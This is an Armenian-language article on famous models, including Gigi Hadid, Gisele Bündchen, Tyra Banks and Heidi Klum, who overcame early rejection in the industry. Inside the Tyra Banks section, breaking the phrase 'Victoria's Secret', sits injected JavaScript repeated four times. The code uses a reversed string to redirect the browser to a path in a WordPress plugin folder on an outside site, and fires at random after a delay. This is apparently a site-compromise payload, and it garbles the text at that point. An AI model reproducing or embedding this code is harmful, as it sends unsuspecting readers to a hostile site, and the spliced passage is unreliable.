Թոփ-մոդելներ, ում հաջողությանը չէին հավատում

Բոլորին հայտնի է, որ նորաձևության և մոդելային ոլորտը շատ դաժան է, և ոչ բոլորն են կարողանում հաղթահարել այն դժվարությունները: Շատ մոդելներ իրենց կարիերայի սկզբում անհաջողություններ են ունենում, քանի որ վստահ չեն իրենց ուժերին, որը կոտրում և թուլացնում է նրանց։ Սակայն նրանցից որոշները անկոտրուն  գնում են առաջ։

Ջիջի Հադիդ

Աշխարհահռչակ մոդելը միանգամից չէ, որ հասել է այն բարձրունքին, որտեղ գտնվում է հիմա։ Ջիջին մանկուց զբաղվել է ձիավարությամբ և նրա կազմվածքը համապատասխան էր այդ սպորտաձևին։ Սակայն հենց այդ կազմվաշքը խանգարել է նրան մոդելային կարիերայում։ Իր հարցազրույցներից մեկի ժամանակ գեղեցկուհին նշել է, որ բոլոր քասթինգների ժամանակ իրեն ասել են, որ պետք է նիհարի, որպեսզի կարողանա դառնալ մոդել։ Հիմա Ջիջին բոլոր ճանաչված բրենդերի նորաձևության ցուցադրությունների աստղն է։

Ժիզել Բյունդխեն

Չնայած նրան, որ Ժիզելը արդեն ավարտել է իր կարիերան, միևնույնն է նա համարվում է աշխարհի ամենաբարձր վարձատրվող մոդելներից մեկը։ Սակայն, երբ մոդելը նոր էր սկսել իր կարիերան, մեծ դժվարություններ է ունեցել և երկար ժամանակ չի կարողացել աշխատանք գտնել։ Իր հարցազրույցում Ժիզելը պատմել է. “Հիշում եմ, թե ինչպես էին որոշ մարդիկ ինձ ասում, որ քիթս մեծ է, իսկ աչքերս շատ փոքր…Իսկ հիմա ես կարող եմ համարձակորեն իրենց պատասխանել, որ մեծ քիթը դարձել է իմ անհատականության մի մասը“։

Թայրա Բենքս

Ամբողջ աշխարհում ճանաչված մոդել Թայրա Բենքսը ստիպված է եղել տասնյակ մոդելային գործակալություններ դիմել, որպեսզի որևիցե մեկից լսի դրական պատասխան։ Մոդելը նշել է, որ իր մուգ գույնի մաշկն է խանգարել նրան հասնել նորաձևության բարձրունքներին: Չնայած այս ամենին, Թայրան առաջին սևամորթ մոդելն էր «Victoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toria’s Secret»-ի նորաձևության ցուցադրությանը։

Հայդի Կլում

Հայդի Կլումը ի սկզբանե մոդել դառնալու միտք և նպատակ չի ունեցել: Նրա ընկերուհիներից մեկը խնդրել է Հայդիին մասնակցել մի մրցույթի, որը հաղթելու դեպքում մոդելը կշահի 300000 դոլլար։ Հայդի Կլումը մասնակցում է այդ մրցույթին և հաղթում։ Սակայն այդ հաղթանակից հետո սկսվում են նրա դժվարությունները նորաձևության ոլորտում։ Հայդին պատմել է, որ իրեն խանգարում էր ցածրահասակ լինելը և քաշի ավելցուկը։

Աղբյուր՝ woman.ru